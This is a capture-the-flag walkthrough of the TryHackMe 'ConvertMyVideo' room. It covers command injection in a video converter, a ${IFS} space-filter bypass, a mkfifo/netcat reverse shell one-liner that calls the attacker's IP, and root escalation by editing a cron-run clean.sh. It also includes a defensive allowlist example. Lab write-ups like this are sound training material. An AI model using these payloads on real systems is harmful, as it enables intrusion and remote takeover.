ConvertMyVideo

https://tryhackme.com/room/convertmyvideo

User Flag

As usual, let's start with an nmap scan.

We see there are only two open ports (22, 80). Let's head to port 80.

We see there's a basic video converter. After running gobuster we find a restricted /admin/ folder; we fail to brute-force it, so let's move on.

Let's check the JavaScript.

Nothing fancy. It appends whatever we enter in the field to the end of the URL. Let's use Burp Suite and see if we can do something with it.

We could try command injection and see if it works.

The basic "whoami" didn't work, so let's try payloads from the list below and see if we get lucky.

After a few tries we get some output with ;command;

We can assume there is a space filter; let's see how we can bypass it.

If we use ${IFS} in place of a space, we see it works.
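The filter we just bypassed blocks the space character but still hands the field to a shell, which is why ;command; and ${IFS} get through. As an added example (not code from the room or its author), here is that blacklist beside the fix a developer would apply: an allowlist on the video id and an argv-list invocation that never goes through a shell. The converter binary name, output path and id format are assumptions.

```python
import re
import subprocess
from typing import List

# The room's filter as we inferred it: only the space character is blocked.
# ";whoami;" and "${IFS}" both pass, because ';' and '$' are never checked.
def naive_space_filter(user_input: str) -> bool:
    """Return True when the blacklist accepts the input."""
    return " " not in user_input

# Allowlist instead: letters, digits, '-' and '_' only (assumed id format).
# A leading '-' is also refused so the id can never be parsed as an option.
VIDEO_ID_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$")

def is_valid_video_id(user_input: str) -> bool:
    """Return True only when every character is in the allowlist."""
    return VIDEO_ID_RE.fullmatch(user_input) is not None

def build_converter_argv(video_id: str) -> List[str]:
    """Build the command as an argv list so no shell ever parses the id.

    'converter' and the output directory are placeholders (assumptions).
    The id is one argument; a ';' inside it would be passed literally.
    """
    if not is_valid_video_id(video_id):
        raise ValueError("video id contains characters outside the allowlist")
    return ["converter", "--id", video_id,
            "--out", f"/var/app/tmp/{video_id}.mp3"]

def is_rejected(video_id: str) -> bool:
    """True when build_converter_argv refuses the id."""
    try:
        build_converter_argv(video_id)
    except ValueError:
        return True
    return False

def run_converter(video_id: str) -> subprocess.CompletedProcess:
    # shell=False is the default; passing a list keeps it that way.
    return subprocess.run(build_converter_argv(video_id), check=True,
                          capture_output=True, text=True)

if __name__ == "__main__":
    for sample in ["abc123_-", ";whoami;", "${IFS}"]:  # constructed inputs
        print(f"{sample!r}: blacklist accepts={naive_space_filter(sample)} "
              f"allowlist accepts={is_valid_video_id(sample)}")
```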

Now that we know how to bypass the space filter, we can create a reverse shell file, start an HTTP server and upload that reverse shell to the victim machine.

The content of the rev.sh file will be:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.11.36.103 9001 >/tmp/f

Once we upload the file we have to change its permissions.

Now we can execute it and get a shell (don't forget to start a nc listener first).

We're in. Grab the flag.

Root Flag

After looking around we find credentials to the /admin/ page we mentioned earlier.

We can crack the hash or use hydra against the restricted form. Let's check what's inside that folder.

There's just one button that removes the downloads.

Checking the content of the /tmp/ folder we see there's a little script named "clean.sh".

Let's see if there's any cron job running that file.

Apparently no cron job. Maybe a SUID binary.

Nothing. We can try to check the running processes to see if we find anything useful.

We see there's a cron process running. We can use pspy to get more information about it, so let's upload a copy of pspy64 to the victim machine.

We see that "clean.sh" is executed every few minutes by root. Let's edit the script and add a reverse shell.

Change the permissions.

And after a few seconds we get a root shell. Grab the flag and we're done.
